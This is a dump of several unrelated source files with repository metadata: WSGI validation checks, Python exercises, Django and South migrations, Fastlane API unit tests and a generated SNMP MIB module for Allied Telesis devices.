if '.' in key:
# Extension, we don't care about its type
continue
assert_(type(environ[key]) is StringType,
"Environmental variable %s is not a string: %r (value: %r)"
% (key, type(environ[key]), environ[key]))
assert_(type(environ['wsgi.version']) is TupleType,
"wsgi.version should be a tuple (%r)" % (environ['wsgi.version'],))
assert_(environ['wsgi.url_scheme'] in ('http', 'https'),
"wsgi.url_scheme unknown: %r" % environ['wsgi.url_scheme'])
check_input(environ['wsgi.input'])
check_errors(environ['wsgi.errors'])
# @@: these need filling out:
if environ['REQUEST_METHOD'] not in (
'GET', 'HEAD', 'POST', 'OPTIONS','PUT','DELETE','TRACE'):
warnings.warn(
"Unknown REQUEST_METHOD: %r" % environ['REQUEST_METHOD'],
WSGIWarning)
assert_(not environ.get('SCRIPT_NAME')
or environ['SCRIPT_NAME'].startswith('/'),
"SCRIPT_NAME doesn't start with /: %r" % environ['SCRIPT_NAME'])
assert_(not environ.get('PATH_INFO')
or environ['PATH_INFO'].startswith('/'),
"PATH_INFO doesn't start with /: %r" % environ['PATH_INFO'])
if environ.get('CONTENT_LENGTH'):
assert_(int(environ['CONTENT_LENGTH']) >= 0,
"Invalid CONTENT_LENGTH: %r" % environ['CONTENT_LENGTH'])
if not environ.get('SCRIPT_NAME'):
assert_('PATH_INFO' in environ,
"One of SCRIPT_NAME or PATH_INFO are required (PATH_INFO "
"should at least be '/' if SCRIPT_NAME is empty)")
assert_(environ.get('SCRIPT_NAME') != '/',
"SCRIPT_NAME cannot be '/'; it should instead be '', and "
"PATH_INFO should be '/'")
def check_input(wsgi_input):
for attr in ['read', 'readline', 'readlines', '__iter__']:
assert_(hasattr(wsgi_input, attr),
"wsgi.input (%r) doesn't have the attribute %s"
% (wsgi_input, attr))
def check_errors(wsgi_errors):
for attr in ['flush', 'write', 'writelines']:
assert_(hasattr(wsgi_errors, attr),
"wsgi.errors (%r) doesn't have the attribute %s"
% (wsgi_errors, attr))
def check_status(status):
assert_(type(status) is StringType,
"Status must be a string (not %r)" % status)
# Implicitly check that we can turn it into an integer:
status_code = status.split(None, 1)[0]
assert_(len(status_code) == 3,
"Status codes must be three characters: %r" % status_code)
status_int = int(status_code)
assert_(status_int >= 100, "Status code is invalid: %r" % status_int)
if len(status) < 4 or status[3] != ' ':
warnings.warn(
"The status string (%r) should be a three-digit integer "
"followed by a single space and a status explanation"
% status, WSGIWarning)
def check_headers(headers):
assert_(type(headers) is ListType,
"Headers (%r) must be of type list: %r"
% (headers, type(headers)))
header_names = {}
for item in headers:
assert_(type(item) is TupleType,
"Individual headers (%r) must be of type tuple: %r"
% (item, type(item)))
assert_(len(item) == 2)
name, value = item
assert_(name.lower() != 'status',
"The Status header cannot be used; it conflicts with CGI "
"script, and HTTP status is not given through headers "
"(value: %r)." % value)
header_names[name.lower()] = None
assert_('\n' not in name and ':' not in name,
"Header names may not contain ':' or '\\n': %r" % name)
assert_(header_re.search(name), "Bad header name: %r" % name)
assert_(not name.endswith('-') and not name.endswith('_'),
"Names may not end in '-' or '_': %r" % name)
if bad_header_value_re.search(value):
assert_(0, "Bad header value: %r (bad char: %r)"
% (value, bad_header_value_re.search(value).group(0)))
def check_content_type(status, headers):
code = int(status.split(None, 1)[0])
# @@: need one more person to verify this interpretation of RFC 2616
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
NO_MESSAGE_BODY = (204, 304)
for name, value in headers:
if name.lower() == 'content-type':
if code not in NO_MESSAGE_BODY:
return
assert_(0, ("Content-Type header found in a %s response, "
"which must not return content.") % code)
if code not in NO_MESSAGE_BODY:
assert_(0, "No Content-Type header found in headers (%s)" % headers)
def check_exc_info(exc_info):
assert_(exc_info is None or type(exc_info) is type(()),
"exc_info (%r) is not a tuple: %r" % (exc_info, type(exc_info)))
# More exc_info checks?
def check_iterator(iterator):
# Technically a string is legal, which is why it's a really bad
# idea, because it may cause the response to be returned
# character-by-character
assert_(not isinstance(iterator, str),
"You should not return a string as your application iterator, "
"instead return a single-item list containing that string.")
| [
"[email protected]"
]
| |
b51f457a805186eaa93adc2cc94cb037a560f42a | 9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612 | /exercises/1901040058/1001S02E05_array.py.py | 9b79494c7bd80613fe0fbe7ad3d6749416df796a | []
| no_license | shen-huang/selfteaching-python-camp | e8410bfc06eca24ee2866c5d890fd063e9d4be89 | 459f90c9f09bd3a3df9e776fc64dfd64ac65f976 | refs/heads/master | 2022-05-02T05:39:08.932008 | 2022-03-17T07:56:30 | 2022-03-17T07:56:30 | 201,287,222 | 9 | 6 | null | 2019-08-08T15:34:26 | 2019-08-08T15:34:25 | null | UTF-8 | Python | false | false | 319 | py | array=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
array.reverse()
print(array)
str1=''.join('%s'%id for id in array)
print(str1)
str2=str1[2:8]
print(str2)
str3=str2[::-1]
print(str3)
int1=int(str3)
print(int1)
int2="{0:b}".format(int1)
print(int2)
int3="{0:o}".format(int1)
print(int3)
int4="{0:x}".format(int1)
print(int4)
| [
"[email protected]"
]
| |
1fe2794cabf63d91afdf446afb6eda5ac5eac6e6 | e305ea0e2b84b1cbb138e4443d13c915d7f467cd | /面试题58 - I翻转单词顺序.py | 063790615dc5a9a89d3f8b2617ae65f2da976cfb | []
| no_license | JoanWu5/jianzhi-offer | 770d7fd903779e3e530386705a9a513224a05539 | 580287d9bcf288d374b64b5a87c9921733a7a4f9 | refs/heads/master | 2022-10-11T10:36:51.837879 | 2020-06-06T08:59:16 | 2020-06-06T08:59:16 | 268,311,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
# s = s.strip().split()
# result = []
# for i in range(len(s)-1,-1,-1):
# if s[i] != ' ':
# result.append(s[i])
# return ' '.join(result)
result = []
s = s.strip()
i = j = len(s)-1
while i>=0:
while i>=0 and s[i]!=' ':
i-=1
result.append(s[i+1:j+1])
while s[i]== ' ':
i-=1
j=i
return ' '.join(result)
s = Solution()
print(s.reverseWords("a good example")) | [
"[email protected]"
]
| |
cdb3412b2336af2ceed7175b2fbeaf22845d0003 | e0ab9c21e51f0ac9d682b901957f2d1e2bc602ee | /product/migrations/0012_auto__del_field_product_has_cutting.py | 3fce9499662853a3018722261c7e9ae3e6714abb | []
| no_license | omago/web2print | bb36707932c76d24d07903fa9ee9c011f0d0d942 | 43bd1d9034e7d6d89457512f1aed376848b64f98 | refs/heads/master | 2021-07-15T09:00:59.389945 | 2016-11-05T21:12:54 | 2016-11-05T21:12:54 | 23,756,408 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 11,322 | py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Product.has_cutting'
db.delete_column('product', 'has_cutting')
def backwards(self, orm):
# Adding field 'Product.has_cutting'
db.add_column('product', 'has_cutting',
self.gf('django.db.models.fields.BooleanField')(default=None),
keep_default=False)
models = {
u'flexion.flexion': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Flexion', 'db_table': "'flexion'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'format.format': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Format', 'db_table': "'format'"},
'height': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product_subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['product_subcategory.ProductSubcategory']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['user.User']", 'null': 'True', 'blank': 'True'}),
'user_format': ('django.db.models.fields.BooleanField', [], {}),
'width': ('django.db.models.fields.IntegerField', [], {})
},
u'paper.paper': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Paper', 'db_table': "'paper'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'paper_finish': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['paper_finish.PaperFinish']", 'null': 'True', 'blank': 'True'}),
'paper_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['paper_type.PaperType']"}),
'paper_weight': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['paper_weight.PaperWeight']"}),
'price_per_kilogram': ('django.db.models.fields.DecimalField', [], {'max_digits': '11', 'decimal_places': '2'})
},
u'paper_finish.paperfinish': {
'Meta': {'ordering': "['-pk']", 'object_name': 'PaperFinish', 'db_table': "'paper_finish'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'paper_type.papertype': {
'Meta': {'ordering': "['-pk']", 'object_name': 'PaperType', 'db_table': "'paper_type'"},
'better_quality_paper': ('django.db.models.fields.BooleanField', [], {}),
'has_finish': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'paper_weight.paperweight': {
'Meta': {'ordering': "['-pk']", 'object_name': 'PaperWeight', 'db_table': "'paper_weight'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'weight': ('django.db.models.fields.IntegerField', [], {})
},
u'plastic.plastic': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Plastic', 'db_table': "'plastic'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'press.press': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Press', 'db_table': "'press'"},
'both_sides_print': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'product.product': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Product', 'db_table': "'product'"},
'cover_paper': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['paper.Paper']", 'null': 'True', 'symmetrical': 'False'}),
'cover_plastic': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['plastic.Plastic']", 'null': 'True', 'symmetrical': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'flexion': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-flexion'", 'null': 'True', 'to': u"orm['flexion.Flexion']"}),
'formats': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-formats'", 'null': 'True', 'to': u"orm['format.Format']"}),
'has_cover': ('django.db.models.fields.BooleanField', [], {}),
'has_creasing': ('django.db.models.fields.BooleanField', [], {}),
'has_flexion': ('django.db.models.fields.BooleanField', [], {}),
'has_hole_drilling': ('django.db.models.fields.BooleanField', [], {}),
'has_improper_cutting': ('django.db.models.fields.BooleanField', [], {}),
'has_insert': ('django.db.models.fields.BooleanField', [], {}),
'has_laminating': ('django.db.models.fields.BooleanField', [], {}),
'has_mutations': ('django.db.models.fields.BooleanField', [], {}),
'has_plastic': ('django.db.models.fields.BooleanField', [], {}),
'has_rounding': ('django.db.models.fields.BooleanField', [], {}),
'has_title': ('django.db.models.fields.BooleanField', [], {}),
'has_vacuuming': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'insert_paper': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-insert-paper'", 'null': 'True', 'to': u"orm['paper.Paper']"}),
'meta_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'paper': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'paper'", 'null': 'True', 'to': u"orm['paper.Paper']"}),
'plastic': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-plastic'", 'null': 'True', 'to': u"orm['plastic.Plastic']"}),
'press': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['press.Press']", 'null': 'True', 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['product_subcategory.ProductSubcategory']"})
},
u'product_category.productcategory': {
'Meta': {'ordering': "['-pk']", 'object_name': 'ProductCategory', 'db_table': "'product_category'"},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'})
},
u'product_subcategory.productsubcategory': {
'Meta': {'ordering': "['-pk']", 'object_name': 'ProductSubcategory', 'db_table': "'product_subcategory'"},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['product_category.ProductCategory']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'})
},
u'user.user': {
'Meta': {'ordering': "['-pk']", 'object_name': 'User', 'db_table': "'user'"},
'activation_code': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True'}),
'click_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '11', 'decimal_places': '2', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'contact_person': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'e_mail': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'oib': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'reset_password_code': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'reset_password_code_expiration': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'start_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '11', 'decimal_places': '2', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '254', 'db_index': 'True'})
}
}
complete_apps = ['product'] | [
"[email protected]"
]
| |
6c7782966748458a5b72ad96b769db9cf5d70920 | c9fcf2ff1acd16a423c47617145cde00cc1936aa | /tests/unit/api/test_task.py | eb114f77afdfcf11338986fe6f0b9774b96cf0bd | [
"MIT"
]
| permissive | JonathanAlcantara/fastlane | 766dd6701fcf172b6d7bb38983e19bd596cbf0d7 | dd923f0769281e94da98c4de39c57e3d447aeea3 | refs/heads/master | 2020-04-28T19:33:45.310622 | 2019-03-12T20:46:42 | 2019-03-12T20:46:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,027 | py | # Standard Library
from json import loads
from uuid import uuid4
# 3rd Party
import pytest
from preggy import expect
# Fastlane
from fastlane.models.task import Task
def test_get_tasks(client):
"""Test getting tasks"""
Task.create_task("my-task-1")
Task.create_task("my-task-2")
Task.create_task("my-task-3")
resp = client.get("/tasks/")
expect(resp.status_code).to_equal(200)
data = loads(resp.data)
expect(data["items"]).to_length(3)
expect(data["total"]).to_equal(3)
expect(data["page"]).to_equal(1)
expect(data["pages"]).to_equal(1)
expect(data["perPage"]).to_equal(3)
expect(data["hasNext"]).to_be_false()
expect(data["hasPrev"]).to_be_false()
def test_get_tasks2(client):
"""Test getting tasks returns CORS headers"""
resp = client.get("/tasks/")
expect(resp.status_code).to_equal(200)
headers = dict(resp.headers)
expect(headers).to_include("Access-Control-Allow-Origin")
expect(headers["Access-Control-Allow-Origin"]).to_equal("*")
def test_get_tasks3(client):
"""Test getting tasks returns CORS headers with custom origin"""
client.application.config["CORS_ORIGINS"] = "domain.com"
resp = client.get("/tasks/")
expect(resp.status_code).to_equal(200)
headers = dict(resp.headers)
expect(headers).to_include("Access-Control-Allow-Origin")
expect(headers["Access-Control-Allow-Origin"]).to_equal("*")
def test_get_tasks_data(client):
"""Test getting tasks resource data"""
task = Task.create_task("my-task")
resp = client.get("/tasks/")
data = loads(resp.data)
task_data = data["items"][0]
with client.application.app_context():
expect(task_data.keys()).to_equal(task.to_dict().keys())
def test_get_tasks_pagination(client):
"""Test getting tasks pagination"""
Task.create_task("my-task-1")
Task.create_task("my-task-2")
Task.create_task("my-task-3")
Task.create_task("my-task-4")
app = client.application
server_name = app.config["SERVER_NAME"]
resp = client.get("/tasks/?page=2")
data = loads(resp.data)
expect(data["total"]).to_equal(4)
expect(data["page"]).to_equal(2)
expect(data["hasNext"]).to_be_false()
expect(data["hasPrev"]).to_be_true()
expect(data["prevUrl"]).to_equal(f"http://{server_name}/tasks/?page=1")
expect(data["nextUrl"]).to_be_null()
def test_get_tasks_pagination2(client):
"""
Test getting tasks pagination should respond 400 when page is invalid
"""
resp1 = client.get("/tasks/?page=asdasdas")
expect(resp1.status_code).to_equal(400)
resp2 = client.get("/tasks/?page=1019021")
expect(resp2.status_code).to_equal(404)
resp3 = client.get("/tasks/?page=0")
expect(resp3.status_code).to_equal(400)
resp4 = client.get("/tasks/?page=-1")
expect(resp4.status_code).to_equal(400)
def test_get_task_details(client):
"""Test getting tasks"""
task_id = str(uuid4())
job_id = str(uuid4())
task = Task.create_task(task_id)
task.create_or_update_job(job_id, "ubuntu", "command")
resp = client.get(f"/tasks/{task_id}/")
expect(resp.status_code).to_equal(200)
data = loads(resp.data)
expect(data).to_include("jobs")
expect(data["jobs"]).to_length(1)
job_data = data["jobs"][0]
expect(job_data).to_include("id")
expect(job_data["id"]).to_equal(job_id)
expect(job_data["url"]).to_equal(
f"http://localhost:10000/tasks/{task_id}/jobs/{job_id}/"
)
def test_search_tasks1(client):
"""Tests search task by task_id."""
task_id = f"task-search-{str(uuid4())}"
Task.create_task(task_id)
Task.create_task(str(uuid4()))
Task.create_task(str(uuid4()))
resp = client.get("/search/?query=search")
expect(resp.status_code).to_equal(200)
data = loads(resp.data)
expect(data["items"]).to_length(1)
def test_search_tasks2(client):
"""
Test search tasks pagination should respond error when page is invalid
"""
resp1 = client.get("/search/?query=qwe&page=asdasdas")
expect(resp1.status_code).to_equal(400)
resp2 = client.get("/search/?query=qwe&page=1019021")
expect(resp2.status_code).to_equal(404)
resp3 = client.get("/search/?query=qwe&page=0")
expect(resp3.status_code).to_equal(400)
resp4 = client.get("/search/?query=qwe&page=-1")
expect(resp4.status_code).to_equal(400)
def test_job_details1(client):
"""Tests get job details returns proper details and last 20 execs."""
pytest.skip("Not implemented")
def test_job_stdout1(client):
"""Tests get job stdout returns log for last execution."""
pytest.skip("Not implemented")
def test_job_stdout2(client):
"""Tests get job stdout fails if invalid input."""
pytest.skip("Not implemented")
def test_job_stderr1(client):
"""Tests get job stderr returns log for last execution."""
pytest.skip("Not implemented")
def test_job_stderr2(client):
"""Tests get job stderr fails if invalid input."""
pytest.skip("Not implemented")
def test_job_logs1(client):
"""Tests get job logs returns log for last execution."""
pytest.skip("Not implemented")
def test_job_logs2(client):
"""Tests get job logs fails if invalid input."""
pytest.skip("Not implemented")
def test_stop_container1(client):
"""Tests that stopping a running container actually stops the container."""
pytest.skip("Not implemented")
def test_stop_container2(client):
"""Tests that stopping a scheduled job kills the scheduling."""
pytest.skip("Not implemented")
def test_stop_container3(client):
"""Tests that stopping a CRON job kills the scheduling."""
pytest.skip("Not implemented")
def test_stop_container4(client):
"""Tests that stopping without an end slash fails with 404."""
pytest.skip("Not implemented")
def test_stop_container5(client):
"""Tests that stopping a scheduled job with no executions actually kills the scheduled job."""
pytest.skip("Not implemented")
| [
"[email protected]"
]
| |
e2bcdd2563f558acd6fe945a5fb664ab81c64eea | 127e99fbdc4e04f90c0afc6f4d076cc3d7fdce06 | /2021_하반기 코테연습/boj22858.py | 655bd7eab90f926e09c88916a4e2769f02d0f280 | []
| no_license | holim0/Algo_Study | 54a6f10239368c6cf230b9f1273fe42caa97401c | ce734dcde091fa7f29b66dd3fb86d7a6109e8d9c | refs/heads/master | 2023-08-25T14:07:56.420288 | 2021-10-25T12:28:23 | 2021-10-25T12:28:23 | 276,076,057 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from collections import defaultdict
n, k = map(int, input().split())
answer = []
after_k = list(map(int, input().split()))
d = list(map(int, input().split()))
for _ in range(k):
tmp = [0] *n
for i in range(n):
tmp[d[i]-1] = after_k[i]
after_k = tmp
for i in range(n):
print(after_k[i],end=" ")
| [
"[email protected]"
]
| |
251820f0a584d8815135b3db62e5b44d48b87e58 | 4b5ee91dabf402522685cea452ba51c10dbb834e | /server/scrolls/migrations/0019_auto_20180608_1241.py | 0e839793ab7e8a2ddbc96b05321e94c0dee0d579 | []
| no_license | unscrollinc/unscroll | 8fb175d6cf9c2f91bdfc7a97a8da71beca7e702d | 88168af51abf8a0bfa06dcc22bd0ec11b671d989 | refs/heads/master | 2023-01-10T03:15:17.737493 | 2021-01-28T20:57:57 | 2021-01-28T20:57:57 | 196,251,483 | 7 | 0 | null | 2023-01-09T22:06:57 | 2019-07-10T17:52:37 | JavaScript | UTF-8 | Python | false | false | 381 | py | # Generated by Django 2.0.4 on 2018-06-08 12:41
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('scrolls', '0018_auto_20180608_0404'),
]
operations = [
migrations.AlterUniqueTogether(
name='event',
unique_together={('by_user', 'in_scroll', 'title', 'source_url')},
),
]
| [
"[email protected]"
]
| |
e13b598b3ab59e0ff74d9435e43e41c82855e572 | 5a4ab9ea5e3060bf7744853c0fa261af527876d6 | /day03/orm_demo1/boo/migrations/0002_article.py | 1d15706a8dcc361abb33ea0a575a577eafed267c | []
| no_license | gaohj/jxlg_0304 | 3cabe3bc56d6a3e0a97f25bc1b684da27e0a0b96 | 9e34dba2abcb752fff692b2c25adb3defd098a87 | refs/heads/master | 2020-06-02T23:34:02.489012 | 2019-06-28T08:58:56 | 2019-06-28T08:58:56 | 191,345,040 | 3 | 4 | null | null | null | null | UTF-8 | Python | false | false | 700 | py | # Generated by Django 2.0 on 2019-06-14 07:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('boo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('title', models.CharField(max_length=100)),
('content', models.TextField()),
('pub_time', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'articles',
'ordering': ['pub_time'],
},
),
]
| [
"[email protected]"
]
| |
b364d718fc562acdadbf704f30576137acad4fb7 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp/AT-SETUP-MIB.py | 886100562cc364dc65fb729e95027670ac0c8fde | [
"Apache-2.0"
]
| permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 11,116 | py | #
# PySNMP MIB module AT-SETUP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/AT-SETUP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:14:36 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint")
modules, = mibBuilder.importSymbols("AT-SMI-MIB", "modules")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Bits, Unsigned32, MibIdentifier, ModuleIdentity, Counter32, TimeTicks, ObjectIdentity, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Gauge32, IpAddress, iso, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "Unsigned32", "MibIdentifier", "ModuleIdentity", "Counter32", "TimeTicks", "ObjectIdentity", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Gauge32", "IpAddress", "iso", "Counter64")
TruthValue, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "DisplayString", "TextualConvention")
setup = ModuleIdentity((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500))
setup.setRevisions(('2013-10-14 00:00', '2012-09-21 00:00', '2010-11-20 00:00', '2010-10-08 00:00', '2010-09-10 00:00', '2010-09-08 00:00', '2010-06-15 00:15', '2010-04-09 00:00', '2008-10-02 00:00', '2008-09-30 00:00', '2008-09-24 00:00', '2008-05-21 00:00',))
if mibBuilder.loadTexts: setup.setLastUpdated('201310140000Z')
if mibBuilder.loadTexts: setup.setOrganization('Allied Telesis, Inc.')
class SystemFileOperationType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("idle", 1), ("success", 2), ("failure", 3), ("saving", 4), ("syncing", 5))
restartDevice = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: restartDevice.setStatus('deprecated')
restartStkMemberDevice = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: restartStkMemberDevice.setStatus('current')
firmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2))
currentFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1))
currSoftVersion = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftVersion.setStatus('current')
currSoftName = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftName.setStatus('current')
currSoftSaveAs = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: currSoftSaveAs.setStatus('deprecated')
currSoftSaveToFile = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: currSoftSaveToFile.setStatus('current')
currSoftSaveStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 5), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftSaveStatus.setStatus('current')
currSoftLastSaveResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftLastSaveResult.setStatus('current')
nextBootFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2))
nextBootVersion = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nextBootVersion.setStatus('current')
nextBootPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nextBootPath.setStatus('current')
